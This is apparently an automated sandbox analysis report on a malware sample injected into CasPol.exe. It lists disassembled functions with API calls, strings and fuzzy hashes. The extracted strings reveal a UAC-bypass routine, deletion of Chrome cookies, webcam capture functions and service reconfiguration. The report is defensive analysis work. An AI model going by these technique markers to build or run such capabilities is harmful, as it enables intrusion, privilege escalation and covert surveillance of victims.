                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                          • String ID: csm
                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                          • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                          • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                                                          • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                          • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                                                                                                                                            • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                                                                                            • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                                                                                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0041B7F4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                                                                          • String ID: .exe$http\shell\open\command$h}v$program files (x86)\$program files\
                                                                                                                                                                          • API String ID: 3286818993-3387863453
                                                                                                                                                                          • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                                                                                          • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                                                                                                                          • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                                                                                          • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                                                                                                                                          • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                                                                                                                          • Opcode Fuzzy Hash: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                                                                                                                                          • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                                                                                                          • _free.LIBCMT ref: 00450FC8
                                                                                                                                                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                          • _free.LIBCMT ref: 00450FD3
                                                                                                                                                                          • _free.LIBCMT ref: 00450FDE
                                                                                                                                                                          • _free.LIBCMT ref: 00451032
                                                                                                                                                                          • _free.LIBCMT ref: 0045103D
                                                                                                                                                                          • _free.LIBCMT ref: 00451048
                                                                                                                                                                          • _free.LIBCMT ref: 00451053
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                                          • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                                          • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                                                          • _free.LIBCMT ref: 100092AB
                                                                                                                                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                          • _free.LIBCMT ref: 100092B6
                                                                                                                                                                          • _free.LIBCMT ref: 100092C1
                                                                                                                                                                          • _free.LIBCMT ref: 10009315
                                                                                                                                                                          • _free.LIBCMT ref: 10009320
                                                                                                                                                                          • _free.LIBCMT ref: 1000932B
                                                                                                                                                                          • _free.LIBCMT ref: 10009336
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                          • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                                                          • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                                                                          APIs
                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                                                                                                          • int.LIBCPMT ref: 004111BE
                                                                                                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                          • String ID: 8mG
                                                                                                                                                                          • API String ID: 2536120697-3990007011
                                                                                                                                                                          • Opcode ID: 14799048d37b477e6c40f7e8d4f0e89b1ed2b05bcd10956721a24fc1261bb2b4
                                                                                                                                                                          • Instruction ID: 3a14b803bc510f5ed1108d30ac07207671fc4f07faef22c9ffd8c11cb1ae2def
                                                                                                                                                                          • Opcode Fuzzy Hash: 14799048d37b477e6c40f7e8d4f0e89b1ed2b05bcd10956721a24fc1261bb2b4
                                                                                                                                                                          • Instruction Fuzzy Hash: D3112332900124A7CB14EBAAD8018DEBBA99F44364F11456FFE04B72E1DB789E41CBD8
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                          • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                                                                                                          • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                                                                                                                          • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                                                                                                          • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                                                                                                                          APIs
                                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                                                                                                                                                                            • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                                                                                                                            • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                                                                                          • CoUninitialize.OLE32 ref: 00407664
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                                                          • API String ID: 3851391207-2637227304
                                                                                                                                                                          • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                                                                                          • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                                                                                                                          • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                                                                                          • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040BB22
                                                                                                                                                                          Strings
                                                                                                                                                                          • UserProfile, xrefs: 0040BAE8
                                                                                                                                                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                                                                                                                          • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                                                                                                                          • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteErrorFileLast
                                                                                                                                                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                                                          • API String ID: 2018770650-304995407
                                                                                                                                                                          • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                                                                                                          • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                                                                                                                          • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                                                                                                          • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                                                                                                                          APIs
                                                                                                                                                                          • __allrem.LIBCMT ref: 0043ACE9
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                                                                                                                          • __allrem.LIBCMT ref: 0043AD1C
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                                                                                                                          • __allrem.LIBCMT ref: 0043AD51
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1992179935-0
                                                                                                                                                                          • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                                                                                                          • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                                                                                                                          • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                                                                                                          • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                                                                                                                                            • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: H_prologSleep
• String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$XNG
• API String ID: 3469354165-985523790
• Opcode ID: ea398e5fe63a9b0ac4c6d9fe10c053d60d471deacd8251bb8fe61ead643a074b
• Instruction ID: 7593a199e81997f2aad1dc538160579efde4e563a54277089fa649d8e7e3dbe8
• Opcode Fuzzy Hash: ea398e5fe63a9b0ac4c6d9fe10c053d60d471deacd8251bb8fe61ead643a074b
• Instruction Fuzzy Hash: 2A51E0B1A042106BCA14FB369D0A66E3655ABC4748F00443FFA09676E2DF7D8E46839E
APIs
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
• Opcode ID: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
• Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
• Opcode Fuzzy Hash: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
• Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
APIs
• _strlen.LIBCMT ref: 10001607
• _strcat.LIBCMT ref: 1000161D
• lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
• lstrcatW.KERNEL32(?,?), ref: 1000165A
• lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
• lstrcatW.KERNEL32(00001008,?), ref: 10001686
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: lstrcatlstrlen$_strcat_strlen
• String ID:
• API String ID: 1922816806-0
• Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
• Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
• Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
• Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
APIs
• lstrcatW.KERNEL32(?,?), ref: 10001038
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
• lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
• GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: lstrlen$AttributesFilelstrcat
• String ID:
• API String ID: 3594823470-0
• Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
• Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
• Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
• Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ChangeConfigManager
• String ID:
• API String ID: 493672254-0
• Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
• Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
• Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
• Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
APIs
• GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
• SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
• Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
• Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
• Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
APIs
• GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
• _free.LIBCMT ref: 004482CC
• _free.LIBCMT ref: 004482F4
• SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
• SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
• _abort.LIBCMT ref: 00448313
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
• Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
• Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
• Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
APIs
• GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
• _free.LIBCMT ref: 10005B2D
• _free.LIBCMT ref: 10005B55
• SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
• SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
• _abort.LIBCMT ref: 10005B74
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
• Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
• Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
